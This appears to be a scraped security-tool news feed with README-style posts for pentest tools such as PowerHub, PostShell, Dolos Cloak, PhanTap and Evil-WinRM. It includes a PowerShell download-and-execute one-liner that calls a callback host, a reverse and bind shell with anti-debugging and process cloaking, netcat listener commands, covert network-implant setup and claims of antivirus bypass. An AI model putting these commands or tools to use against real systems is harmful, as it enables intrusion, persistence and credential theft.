  -session string
        Session file name. (default "<domain-name>-xray-session.json")
  -shodan-key string
        Shodan API key.
  -viewdns-key string
        ViewDNS API key.
  -wordlist string
        Wordlist file to use for enumeration. (default "wordlists/default.lst")

Example:

# xray -shodan-key yadayadayadapicaboo... -viewdns-key foobarsomethingsomething... -domain fbi.gov

____  ___
\   \/  /
 \     RAY v 1.0.0b
 /    by Simone 'evilsocket' Margaritelli
/___/\  \
      \_/

@ Saving session to fbi.gov-xray-session.json
@ Web UI running on http://127.0.0.1:8080/

Download XRay

Article link

Date of publish: Mon, 11 Nov 2019 09:53:00 +0000

Hacking for Dummies, 6th Edition ($29.99 Value) Free


"Hacking for Dummies, 6th Edition ($29.99 Value) Free for a Limited Time"

Stop hackers before they hack you!


In order to outsmart a would-be hacker, you need to get into the hacker’s mindset and with this book, thinking like a bad guy has never been easier. Get expert knowledge on penetration testing, vulnerability assessments, security best practices, and ethical hacking that is essential in order to stop a hacker in their tracks.

This no-nonsense book helps you learn how to recognize the vulnerabilities in your systems so you can safeguard them more diligently—with confidence and ease.
  • Get up to speed on Windows 10 hacks  
  • Learn about the latest mobile computing hacks
  • Get free testing tools   
  • Find out about new system updates and improvements
  • There’s no such thing as being too safe — and this resourceful guide helps ensure you’re protected.



Free offer expires 10/15/19

Offered Free by: Wiley

Article link

Date of publish: Mon, 14 Oct 2019 14:22:00 +0000

TraXSS - Automated XSS Vulnerability Scanner


  • Automated Vulnerability Scanner for XSS 
  • Written in Python3 


Traxss is an automated framework to scan URLs and webpages for XSS Vulnerabilities. It includes over 575 Payloads to test with and multiple options for robustness of tests.

Getting Started

Prerequisites
Traxss depends on Chromedriver. On MacOS this can be installed with the homebrew command:

brew install cask chromedriver

Alternatively, find a version for other operating systems here: https://sites.google.com/a/chromium.org/chromedriver/downloads

Installation

Run the command:

pip3 install -r requirements.txt

Running Traxss
Traxx can be started with the command:

python3 traxss.py

This will launch an interactive CLI to guide you through the process.

Types of Scans

Full Scan with HTML

Uses a query scan with 575+ payloads and attempts to find XSS vulnerabilities by passing parameters through the URL. It will also render the HTML and attempt to find manual XSS Vulnerablities (this feature is still in beta).

Full Scan w/o HTML

This scan will run the query scan only.

Fast Scan w/o HTML

This scan is the same as the full w/ HTML but it will only use 7 attack vectors rather than the 575+ vectors.

Fast Scan w/o HTML

This scan is the same as the fast w/o HTML but it will only use 7 attack vectors rather than the 575+ vectors.

Contributing

Thank you for your interest! All types of contributions are welcome.
  • Fork and clone this repository
  • Create your branch from the master branch
  • Please open your PR with the master branch as the base

Download TraXSS

Article link

Date of publish: Mon, 14 Oct 2019 08:28:00 +0000

Penta- Open Source All-in-one CLI To Automate Pentesting


Penta (PENTest + Automation tool) is Pentest automation tool using Python3.

Installation

Install requirements
penta requires the following packages.
  • Python3.7
  • pipenv

Resolve python package dependency.

$ pipenv install

If you dislike pipenv..

$ pip install -r requirements.txt

Usage

$ pipenv run start <options>

If you dislike pipenv...

$ python penta/penta.py

Usage: List options

$ pipenv run start -h

usage: penta.py [-h] [-target TARGET] [-ports PORTS] [-proxy PROXY]

Penta is Pentest automation tool.

optional arguments:
  •   -h, --help      show this help message and exit
  •   -target TARGET  Specify target IP / domain
  •   -ports PORTS    Please, specify the target port(s) separated by comma.
  •                   Default: 21,22,25,80,110,443,8080
  •   -proxy PROXY    Proxy[IP:PORT]

Usage: Main menu

[ ] === MENU LIST =================================
[0] EXIT
[1] Port scanning Default: 21,22,25,80,110,443,8080
[2] Nmap & vuln scanning
[3] Check HTTP option methods
[4] Grab DNS server info
[5] Shodan host search
[6] FTP connect with anonymous
[7] SSH connect with Brute Force
[99] Change target host

1. Port scanning
To check ports for a target. Log output supported.

2. Nmap
To check ports by additional means using nmap

3. Check HTTP option methods
To check the methods (e.g. GET,POST) for a target.

4. Grab DNS server info
To show the info about DNS server.

Shodan host search To collect host service info from Shodan.
Request Shodan API key to enable the feature.

FTP connect with anonymous To check if it has anonymous access activated in port 21. FTP users can authenticate themselves using the plain text sign-in protocol (Typically username and password format), but they can connect anonymously if the server is configured to allow it.

Anyone can log in to the server if the administrator has allowed an FTP connection with an anonymous login.

SSH connect with Brute Force To check ssh connection to scan with Brute Force. Dictionary data is in data/dict.

Download Now

Article link

Date of publish: Thu, 10 Oct 2019 18:57:00 +0000

Dolos Cloak- For Network Penetration Testers To Automated 802.1x Bypass


Dolos Cloak- Automated 802.1x Bypass


Dolos Cloak is a python script designed to help network penetration testers and red teamers bypass 802.1x solutions by using an advanced man-in-the-middle attack.

The script is able to piggyback on the wired connection of a victim device that is already allowed on the target network without kicking the victim device off the network. It was designed to run on an Odroid C2 running Kali ARM and requires two external USB ethernet dongles. It should be possible to run the script on other hardware and distros but it has only been tested on an Odroid C2 thus far.

How it Works

Dolos Cloak uses iptables, arptables, and ebtables NAT rules in order to spoof the MAC and IP addresses of a trusted network device and blend in with regular network traffic. On boot, the script disallows any outbound network traffic from leaving the Odroid in order to hide the MAC addresses of its network interfaces.

Next, the script creates a bridge interface and adds the two external USB ethernet dongles to the bridge. All traffic, including any 802.1x authentication steps, is passed on the bridge between these two interfaces.

In this state, the device is acting like a wire tap. Once the Odroid is plugged in between a trusted device (desktop, IP phone, printer, etc.) and the network, the script listens to the packets on the bridge interface in order to determine the MAC address and IP of the victim device.

Once the script determines the MAC address and IP of the victim device, it configures NAT rules in order to make all traffic on the OUTPUT and POSTROUTING chains look like it is coming from the victim device. At this point, the device is able to communicate with the network without being burned.

Once the Odroid is spoofing the MAC address and IP of the victim device, the script sends out a DHCP request in order to determine its default gateway, search domain, and name servers. It uses the response in order to configure its network settings so that the device can communicate with the rest of the network.

At this point, the Odroid is acting as a stealthy foothold on the network. Operators can connect to the Odroid over the built-in NIC eth0 in order to obtain network access. The device can also be configured to send out a reverse shell so that operators can utilize the device as a drop box and run commands on the network remotely.

For example, the script can be configured to run an Empire python stager after running the man-in-the-middle attack. You can then use the Empire C2 connection to upgrade to a TCP reverse shell or VPN tunnel.

Installation and Usage

  • Perform default install of Kali ARM on Odroid C2. 
ssh root@169.254.44.44
  • Be sure to save this project to /root/tools/dolos_cloak
  • Plug one external USB NIC into the Odroid and run dhclient to get internet access in order to install dependencies:
dhclient usbnet0
  • Run the install script to get all the dependencies and set the Odroid to perform the MitM on boot by default. Keep in mind that this will make drastic changes to the device's network settings and disable Network Manager. You may want to download any additional tools before this step:
cd setup
./setup.sh
  • You may want to install some other tools like 'host' that do not come standard on Kali ARM. Empire, enum4linux, and responder are also nice additions.
  • Make sure you are able to ssh into the Odroid via the built-in NIC eth0. Add your public key to /root/.ssh/authorized_keys for fast access.
  • Modify config.yaml to meet your needs. You should make sure the interfaces match the default names that your Odroid is giving your USB dongles. Order does not matter here. You should leave client_ip, client_mac, gateway_ip, and gateway_mac blank unless you used a LAN tap to mine them. The script should be able to figure this out for us. Set these options only if you know for sure their values. The management_int, domain_name, and dns_server options are placeholders for now but will be usefull very soon. For shells, you can set up a custom autorun command in the config.yaml to run when the man-in-middle attack has autoconfigured. You can also set up a cron job to send back shells.
  • Connect two usb ethernet dongles and reboot the device (you need two because the built-in ethernet won't support promiscuous mode)
  • Boot the device and wait a few seconds for autosniff.py to block the OUTPUT ethernet and IP chains. Then plug in the Odroid between a trusted device and the network.
  • PWN N00BZ, get $$$, have fun, hack the planet

Tips

  • Mod and run ./scripts/upgrade_to_vpn.sh to turn a stealthy Empire agent into a full blown VPN tunnel
  • Mod and run ./scripts/reverse_listener_setup.sh to set up a port for a reverse listener on the device.
  • Run ./scripts/responder_setup.sh to allow control of the protocols that we capture for responder. You shoud run responder on the bridge interface:
responder -I mibr
  • Be careful as some NAC solutions use port 445, 443, and 80 to periodically verify hosts. Working on a solution to this.
  • Logs help when the autosniff.py misbehaves. The rc.local is set to store the current session logs in ./logs/session.log and logs in ./logs/history.log so we can reboot and still check the last session's log if need be. Log files have cool stuff in them like network info, error messages, and all bash commands to set up the NAT ninja magic.

Download Dolos Cloak

Article link

Date of publish: Mon, 23 Sep 2019 07:54:00 +0000

PostShell - Post Exploitation Bind/Backconnect Shell


PostShell - Post Exploitation Bind/Backconnect Shell


PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control.

The stub size is around 14kb and can be compiled on any Unix like system. Banner and interaction with shell after a connection is started.

Why not use a traditional Backconnect/Bind Shell?

PostShell allows for easier post-exploitation by making the attacker less dependant on dependencies such as Python and Perl.

It also incorporates both a back connect and bind shell, meaning that if a target doesn't allow outgoing connections an operator can simply start a bind shell and connect to the machine remotely.

PostShell is also significantly less suspicious than a traditional shell due to the fact both the name of the processes and arguments are cloaked.

Features

  • Anti-Debugging, if ptrace is detected as being attached to the shell it will exit.
  • Process Name/Thread names are cloaked, a fake name overwrites all of the system arguments and file name to make it seem like a legitimate program.
  • TTY, a TTY is created which essentially allows for the same usage of the machine as if you were connected via SSH.
  • Bind/Backconnect shell, both a bind shell and back connect can be created.
  • Small Stub Size, a very small stub(<14kb) is usually generated.
  • Automatically Daemonizes
  • Tries to set GUID/UID to 0 (root)

Getting Started

  1. Downloading: git clone https://github.com/rek7/postshell
  2. Compiling: cd postshell && sh compile.sh This should create a binary called "stub" this is the malware.

Commands

$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$

Example Usage

Backconnect:

$ ./stub 127.0.0.1 13377

Bind Shell:

$ ./stub 13377

Receiving a Connection with Netcat


Recieving a backconnect:

$ nc -vlp port

Connecting to a bind Shell:

$ nc host port

TODO:

Add domain resolution

Download PostShell

Disclaimer: These scripts for knowledge purpose only

Article link

Date of publish: Tue, 10 Sep 2019 06:31:00 +0000

Findomain- Fastest And Cross-platform Subdomain Enumerator

FinDomain- Fastest And Cross-platform Subdomain Enumerator.


Comparison
It comparison gives you a idea why you should use findomain instead of another enumerators. The domain used for the test was Microsoft.com in the following BlackArch virtual machine:

Host: KVM/QEMU (Standard PC (i440FX + PIIX, 1996) pc-i440fx-3.1)
Kernel: 5.2.6-arch1-1-ARCH
CPU: Intel (Skylake, IBRS) (4) @ 2.904GHz
Memory: 139MiB / 3943MiB

Find-Domain used to calculate the time, is the time command in Linux.

You can see all the details of the tests in it link.


Enumeration ToolSearch TimeTotal Subdomains FoundCPU UsageRAM Usage
Findomainreal 0m38.701s5622Very LowVery Low
assetfinderreal 6m1.117s4630Very LowVery Low
Subl1st3rreal 7m14.996s996LowLow
Amass*real 29m20.301s332Very HighVery High

I can't wait to the amass test for finish, looks like it will never ends and additionally the resources usage is very high.

Note: The benchmark was made the 10/08/2019, since it point other software's can improve things and you will got different results.

Features

  • Discover sub-domains without brute-force, it uses Certificate Transparency Logs.
  • Discover sub-domains with or without IP address according to user arguments.
  • Read target from user argument (-t).
  • Read a list of targets from file and discover their sub-domains with or without IP and also write to output files per-domain if specified by the user, recursively.
  • Write output to TXT file.
  • Write output to CSV file.
  • Write output to JSON file.
  • Cross platform support: Any platform.
  • Optional multiple API support.
  • Proxy support.

Note: the proxy support is just to proxify APIs requests, the actual implementation to discover IP address of sub-domains doesn't support proxyfing and it's made using the host network still if you use the -p option.

How it works?

It tool doesn't use the common methods for sub(domains) discover, the tool uses Certificate Transparency logs to find sub-domains and it method make it tool the most faster and reliable. The tool make use of multiple public available APIs to perform the search. If you want to know more about Certificate Transparency logs, read https://www.certificate-transparency.org/

APIs that are using at the moment:
  • Certspotter: https://api.certspotter.com/
  • Crt.sh : https://crt.sh
  • Virustotal: https://www.virustotal.com/ui/domains/
  • Sublit3r: https://api.sublist3r.com/
  • Facebook: https://developers.facebook.com/docs/certificate-transparency

If you know other that should be added, open an issue.

Supported platforms in our binary releases

All supported platforms in the binarys that we give are 64 bits only and we don't have plans to add support for 32 bits binary releases, if you want to have support for 32 bits follow the documentation.
  • Linux
  • Windows
  • MacOS
  • ARM
  • Arch64 (Raspberry Pi)

Build for 32 bits or another platform

If you want to build the tool for your 32 bits system or another platform, follow it steps:

Note: You need to have rust, make and perl installed in your system first.

Using the Github source code:
  • Clone the repository or download the release source code.
  • Extract the release source code (only needed if you downloaded the compressed file).
  • Go to the folder where the source code is.
  • Execute cargo build --release
  • Now your binary is in target/release/findomain and you can use it.

Installation Android (Termux)

Install the Termux package, open it and follow it commands:

$ pkg install rust make perl
$ cargo install findomain
$ cd $HOME/.cargo/bin
$ ./findomain

Installation in Linux using source code

If you want to install it, you can do that manually compiling the source or using the precompiled binary.

Manually: You need to have rust, make and perl installed in your system first.

$ git clone https://github.com/Edu4rdSHL/findomain.git
$ cd findomain
$ cargo build --release
$ sudo cp target/release/findomain /usr/bin/
$ findomain

Installation in Linux using compiled artifacts

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
$ chmod +x findomain-linux
$ ./findomain-linux

If you are using the BlackArch Linux distribution, you just need to use:

$ sudo pacman -S findomain


Installation ARM

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-arm
$ chmod +x findomain-arm
$ ./findomain-arm

Installation Aarch64 (Raspberry Pi)

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64
$ chmod +x findomain-aarch64
$ ./findomain-aarch64

Installation Windows

Download the binary from 
https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe

Open a CMD shell and go to the dir where findomain-windows.exe was downloaded.

Exec: findomain-windows in the CMD shell.

Installation MacOS

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx
$ chmod +x findomain-osx.dms
$ ./findomain-osx.dms

Usage

You can use the tool in two ways, only discovering the domain name or discovering the domain + the IP address.

findomain 0.2.0
Eduard Tolosa <tolosaeduard@gmail.com>
A tool that use Certificates Transparency logs to find subdomains.

USAGE:
    findomain [FLAGS] [OPTIONS]

FLAGS:
    -a, --all-apis    Use all the available APIs to perform the search. It take more time but you will have a lot of
                      more results.
    -h, --help        Prints help information
    -i, --get-ip      Return the subdomain list with IP address if resolved.
    -V, --version     Prints version information

OPTIONS:
    -f, --file <file>        Sets the input file to use.
    -o, --output <output>    Write data to output file in the specified format. [possible values: txt, csv, json]
    -p, --proxy <proxy>      Use a proxy to make the requests to the APIs.
    -t, --target <target>    Target host


Examples

Make a simple search of subdomains and print the info in the screen:
findomain -t example.com

Make a simple search of subdomains using all the APIs and print the info in the screen:
findomain -t example.com -a

Make a search of subdomains and export the data to a CSV file:
findomain -t example.com -o csv

Make a search of subdomains using all the APIs and export the data to a CSV file:
findomain -t example.com -a -o csv

Make a search of subdomains and resolve the IP address of subdomains (if possible):
findomain -t example.com -i

Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible):
findomain -t example.com -i -a

Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible), exporting the data to a CSV file:
findomain -t example.com -i -a -o csv

Make a search of subdomains using a proxy (http://127.0.0.1:8080 in it case, the rest of aguments continue working in the same way, you just need to add the -p flag to the before commands):
findomain -t example.com -p http://127.0.0.1:8080

Download FinDomain

Article link

Date of publish: Sat, 24 Aug 2019 08:56:00 +0000

Burp Suite Extension - To Monitor And Keep Track of Tested Endpoints


Burp Scope Monitor Extension

A Burp Suite Extension to monitor and keep track of tested endpoints.


Main Features


  • Simple, easy way to keep track of unique endpoints when testing an application
  • Mark individual endpoints as analyzed or not
  • Instantly understand when a new endpoint, not tested is requested
  • Accessible from Proxy tab (right click, mark request as analyzed/not)
  • Send to Repeater
  • Enforcement of Burp's in scope rules
  • Import/Export state file directly to a CSV file for
  • Autosave option


Installation


  1. Make sure you have Jython configured under Extender -> Options -> Python Environment. For further instructions, check PortSwigger official instructions at their support page.
  2. git clone git@github.com:Regala/burp-scope-monitor.git
  3. Import main.py in Extender - Extender -> Extensions -> Add -> Select Python -> Select main.py


Documentation

Most of the options available in General or Import tabs are auto-explanatory.


  • "Repeater request automatically marks as analyzed" - when issuing a request to an endpoint from repeater, it marks this request as analyzed automatically.
  • "Color request in Proxy tab" - this essentially applies the behavior of the extension in the Proxy tab, if you combine these options with "Show only highlighted items" in Proxy. However, it's not as pleasant to the eyes as the color pallete is limited.
  • "Autosave periodically" - backups the state file every 10 minutes. When activating this option, consider disabling "Autostart Scope Monitor". This is in order to maintain a different state file per Burp project. However, you can easily maintain only one, master state file.
  • "Import/Export" is dedicated to handle the saved state files. It's preferred to open your Burp project file associated with the Scope Monitor. It will still work if the Burp project is different, but when loading the saved entries, you won't be able to send them to Repeater or view the request itself in the Request/Response viewer (this is due to the fact that we are not storing the actually requests - just the endpoint, it's analyzed status and a couple of other more. This makes it a little bit more efficient).

Future Development


  • Keep track of parameters observed in all requests
  • Highlight when a new parameter was used in an already observed/analyzed endpoint
  • Export to spreadsheet / Google Sheets
  • Adding notes to the endpoint

Implementation

The code is not yet performant, optimized or anything similar. KISS and it works. Performance will be increased depending on demand and how the extension performs when handling large Burp projects.

To circumvent some of Burp's Extender API limitations, some small hacks were implemented. One of those is automatically setting a comment on the requests that flow in the Proxy tab.

You can still add comments on the items, as you'd normally would, but just make sure to keep the placeholder string (scope-monitor-placeholder) there.

Hopefully in the future each requestResponse from Burp will have a unique identifier, which would make the import state / load from file much cleaner and fast. With large state files, this might hang a bit when loading.

Download Burp Scope Monitor 

Article link

Date of publish: Wed, 21 Aug 2019 11:45:00 +0000

Slurp- To Security Audits of S3 Buckets Enumerator


Slurp- Blackbox/Whitebox S3 Bucket Enumerator

To Evaluate the security of S3 buckets


Overview

  • Credit to all the vendor packages to develop Slurp possible.
  • Slurp is for pen-testers and security professionals to perform audits of s3 buckets.

Features

  • Scan via domain(s); you can target a single domain or a list of domains
  • Scan via keyword(s); you can target a single keyword or a list of keywords
  • Scan via AWS credentials; you can target your own AWS account to see which buckets have been exposed
  • Colorized output for visual grep
  • Currently generates over 28,000 permutations per domain and keyword (thanks to @jakewarren and @random-robbie)
  • Punycode support for internationalized domains
  • Strong copyleft license (GPLv3)

Modes

There are two modes that this tool operates at; blackbox and whitebox mode. Whitebox mode (or internal) is significantly faster than blackbox (external) mode.

Blackbox (external)

In this mode, you are using the permutations list to conduct scans. It will return false positives and there is no way to link the buckets to an actual aws account! Do not open issues asking how to do this.

Domain


Keywords


Whitebox (internal)

In this mode, you are using the AWS API with credentials on a specific account that you own to see what is open. This method pulls all S3 buckets and checks Policy/ACL permissions. Note that, I will not provide support on how to use the AWS API.

Your credentials should be in ~/.aws/credentials.

Internal



Usage

  • slurp domain <-t|--target> example.com will enumerate the S3 domains for a specific target.
  • slurp keyword <-t|--target> linux,golang,python will enumerate S3 buckets based on those 3 key words.
  • slurp internal performs an internal scan using the AWS API.

Installation

This project uses vgo; you can clone and go build or download from Releases section.

Please do not open issues on why you cannot build the project; this project builds like any other project would in Go, if you cannot build then I strongly suggest you read the go spec.

Also, the only binaries I'm including are linux/amd64; if you want mac/windows binaries, build it yourself.

Download Slurp

Article link

Date of publish: Wed, 07 Aug 2019 21:47:00 +0000

PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection

PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection


PowerHub is a convenient post exploitation tool which aids a pentester in transferring files, in particular code which may get flagged by endpoint protection.


During an engagement where you have a test client available, one of the first things you want to do is run PowerSploit. So you need to download the files, messing with endpoint protection, disable the execution policy, etc.

PowerHub provides an (almost) one-click-solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.

Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.

On top of that, PowerHub comes with a reverse PowerShell, making it suitable for any kind of post-exploitation action.

Here is a simple example (grab information about local groups with PowerView and transfer it back):

PS C:\Users\avollmer> $K=new-object net.webclient;IEX $K.downloadstring('http://192.168.11.2:8000/0');
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
                            written by Adrian Vollmer, 2018-2019
Run 'Help-PowerHub' for help
AmsiScanBuffer patch has been applied.
0
PS C:\Users\avollmer> lhm powerview
[*] /ps1/PowerSploit/Recon/PowerView.ps1 imported.
PS C:\Users\avollmer> Get-LocalGroup | pth -Name groups.json


Installation

PowerHub itself does not need to be installed. Just execute powerhub.py. However, there are a few dependencies. They are listed in the requirements.txt. Install them either via pip3 install --user -r requirements.txt or use a virtual environment:

Run python3 -m venv env to create a virtual environment, then use source env/bin/activate to activate it. Now run pip3 install -r requirements.txt to install the depencendies inside the virtual environment.

Python2 is not supported.

Usage

PowerHub has one mandatory argument: the callback host (can be an IP address). You should also use --auth <user>:<pass>, otherwise, a randomly generated password will be used for basic authentication.

The switch --no-auth disables basic authentication which is not recommended. The callback host name is used by the stager to download the payload. If the callback port or path differ from the default, it can also be changed.

Read ./powerhub.py --help and the Wiki for details.

Download PowerHub

Article link

Date of publish: Wed, 07 Aug 2019 21:15:00 +0000

Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap


Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap Aimed at Red Teams.



With limited physical access to a target building, this tap can be installed inline between a network device and the corporate network.


PhanTap is silent in the network and does not affect the victim’s traffic, even in networks having NAC (Network Access Control 802.1X - 2004). PhanTap will analyze traffic on the network and mask its traffic as the victim device.

It can mount a tunnel back to a remote server, giving the user a foothold in the network for further analysis and pivoting. PhanTap is an OpenWrt package and should be compatible with any device. The physical device used for our testing is currently a small, inexpensive router, the GL.iNet GL-AR150.

Features:

  • Transparent network bridge.
  • Silent : No ARP, multicast, broadcast.
  • 802.1x passthrough.
  • Automatic configuration:
Capture traffic exiting the network (the destination is non RFC1918), source IP and MAC is our victim, destination MAC is our gateway,
SNAT bridge traffic to the victim MAC and IP address,
set the router default gateway to the MAC of the gateway detected just before.

  • Introspects ARP, multicast and broadcast traffic and adds a route to the machine IP address and adds the machine MAC address to the neighbor list, hence giving the possibility of talking to all the machines in the local network.
  • Learns the DNS server from traffic and modifies the one on the router so that it's the same.
  • Can run commands (ex: /etc/init.d/openvpn restart) when a new IP or DNS is configured.
  • Lets you choose any VPN software, for example OpenVPN tcp port 443 so it goes through most firewalls.
  • You can talk to the victim machine (using the gateway IP).

Setup

PhanTap has been tested with the GL.iNet GL-AR150. This device has two separate network interfaces in OpenWrt (eth0, eth1).

If your device is using an internal switch (swconfig based) with interfaces like eth0.1, eth0.2, some special traffic might be blocked, e.g. 802.1Q (tagged vlan), but PhanTap should work.
  • Install a snapshot build, for the GL.iNet GL-AR150
  • Update the OpenWrt package list
opkg update
  • Install PhanTap package:
opkg install phantap phantap-learn
  • Configure the Wifi and start administering the router through it.
  • Either reboot the device, or run /etc/init.d/phantap setup.
  • Get the interface names from that device:
# uci show network | grep ifname
network.loopback.ifname='lo'
network.lan.ifname='eth1'
network.wan.ifname='eth0'
network.wan6.ifname='eth0'

In this example we are using a GL-AR150, which only has 2 interfaces.

Add the interfaces to the phantap bridge via the following commands in the cli (assuming we are using a GL-AR150):
  • uci delete network.lan.ifname
  • uci delete network.wan.ifname
  • uci delete network.wan6.ifname
  • uci set network.phantap.ifname='eth0 eth1'
  • uci commit network
  • /etc/init.d/network reload

Phantap is now configured, as soon as you plug it between a victim and their switch, it will automatically configure the router and give it Internet access.

You can add your favorite VPN to have a remote connection back. Tested PhanTap with Vpn, port TCP 443, to avoid some detection methods.

You can also add a command to be ran when a new IP or DNS is configured, in /etc/config/phantap, e.g. /etc/init.d/openvpn restart (restart VPN service).

You can also look at disabling the wifi by default and using hardware buttons to start it (https://openwrt.org/docs/guide-user/hardware/hardware.button).

Limitations or how it can be detected :

  • The GL.iNet GL-AR150 and most inexpensive devices only support 100Mbps, meanwhile modern network traffic will be 1Gbps.
  • The network port will stay up, switch side, when the victim device is disconnected/shutdown.
  • There is no re-configuration of PhanTap, so we might use an IP that has been reattributed to another device (roadmap DHCP).
  • Some traffic is blocked by the Linux bridge (STP/Pause frames/LACP).

Roadmap :

  • Add logic to restart the detection when the links go up/down.
  • Add DHCP packet analysis for dynamic reconfiguration.
  • Add IPv6 support.
  • Test limitations of devices that have switches(swconfig) instead of separate interfaces.

Article link

Date of publish: Wed, 07 Aug 2019 20:47:00 +0000

CloudCheck- To Test String If A Cloudflare DNS Bypass is Possible


CloudCheck- To Test String If A Cloudflare DNS Bypass is Possible 


Cloudcheck is made to be used in the same folder as CloudFail. Make sure all files in this repo are in the same folder before using.

CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by Cloudflare in the hopes of discovering the location of the server.

Using Tor to mask all requests, the tool as of right now has 3 different attack phases.
  • Misconfigured DNS scan using DNSDumpster.com.
  • Scan the Crimeflare.com database.
  • Bruteforce scan over 2500 subdomains.

Cloudcheck create a empty text file called none.txt in the data folder, that way it doesn't do a subdomain brute when testing.

Cloudcheck will automatically change your hosts file, using entries from CloudFail and test for a specified string to detect if said entry can be used to bypass Cloudflare.

If output comes out to be "True", you can use the IP address to bypass Cloudflare in your hosts file. (Later automating this process)

Download Cloudcheck

Article link

Date of publish: Fri, 02 Aug 2019 17:03:00 +0000

The Ultimate WinRM Shell For Penetration Testing


This shell is the ultimate WinRM shell for hacking/pentesting.


WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. 


A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system adminsitrators.

This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase.

The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.

Features

  • Command History
  • WinRM command completion
  • Local files completion
  • Upload and download files
  • List remote machine services
  • FullLanguage Powershell language mode
  • Load Powershell scripts
  • Load in memory dll files bypassing some AVs
  • Load in memory C# (C Sharp) compiled exe files bypassing some AVs
  • Colorization on output messages (can be disabled optionally)

Help

Usage: 
evil-winrm -i IP -u USER -s SCRIPTS_PATH -e EXES_PATH [-P PORT] [-p PASS] [-U URL]

  • -i, --ip IP                Remote host IP or hostname (required)
  • -P, --port PORT                Remote host port (default 5985)
  • -u, --user USER                 Username (required)
  • -p, --password PASS       Password
  • -s, --scripts PS_SCRIPTS_PATH    Powershell scripts path (required)
  • -e, --executables EXES_PATH        C# executables path (required)
  • -U, --url URL                    Remote url endpoint (default /wsman)
  • -V, --version                    Show version
  • -h, --help                           Display this help message


Requirements

Ruby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1.

~$ sudo gem install winrm winrm-fs colorize stringio

Installation 

Step 1. Clone the repo: 

git clone https://github.com/Hackplayers/evil-winrm.git

Step 2. Ready. Just launch it!

 ~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

If you don't want to put the password in clear text, you can optionally avoid to set -p argument and the password will be prompted preventing to be shown.

To use IPv6, the address must be added to /etc/hosts.

Alternative installation method as ruby gem

Step 1. Install it: 

gem install evil-winrm

Step 2. Ready. Just launch it!

~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'


Documentation

Basic commands

  • upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.
  • usage: upload local_path remote_path
  • download: it is not needed to set local_path if the remote file is in the current directory.
  • usage: download remote_path local_path
  • services: list all services. No administrator permissions needed.
  • menu: load the Invoke-Binary and l04d3r-LoadDll functions that we will explain below. When a ps1 is loaded all its functions will be shown up.

Load powershell scripts

To load a ps1 file you just have to type the name (auto-completion usnig tab allowed). The scripts must be in the path set at -s argument. Type menu again and see the loaded functions.


Advanced commands

Invoke-Binary: allows exes compiled from c# to be executed in memory. The name can be auto-completed using tab key and allows up to 3 parameters. The executables must be in the path set at -e argument.



l04d3r-LoadDll: allows loading dll libraries in memory, it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))

The dll file can be hosted by smb, http or locally. Once it is loaded type menu, then it is possible to autocomplete all functions.




Extra features

To disable colors just modify on code this variable $colors_enabled. Set it to false: $colors_enabled = false


Disclaimer 

Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.

Download Winrm

Article link

Date of publish: Wed, 31 Jul 2019 12:21:00 +0000

USBRIP- Simple Command Live Forensic Tool For Tracking USB device

USBRIP- Simple Command Live Forensic Tool For Tracking USB device

Simple command line forensics tool for tracking USB device artifacts (history of USB events) on GNU/Linux.


usbrip (derived from "USB Ripper", not "USB R.I.P." astonished) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.

usbrip is a small piece of software written in pure Python 3 (using some external modules though, see Dependencies/PIP) which parses Linux log files (/var/log/syslog* or /var/log/messages* depending on the distro) for constructing USB event history tables. Such tables may contain the following columns: "Connected" (date & time), "User", "VID" (vendor ID), "PID" (product ID), "Product", "Manufacturer", "Serial Number", "Port" and "Disconnected" (date & time).

Besides, it also can:
  • export gathered information as a JSON dump (and open such dumps, of course);
  • generate a list of authorized (trusted) USB devices as a JSON (call it auth.json);
  • search for "violation events" based on the auth.json: show (or generate another JSON with) USB devices that do appear in history and do NOT appear in the auth.json;
  • When installed with -s flag create crypted storages (7zip archives) to automatically backup and accumulate USB events with the help of crontab scheduler;
  • search additional details about a specific USB device based on its VID and/or PID.

Quick Start

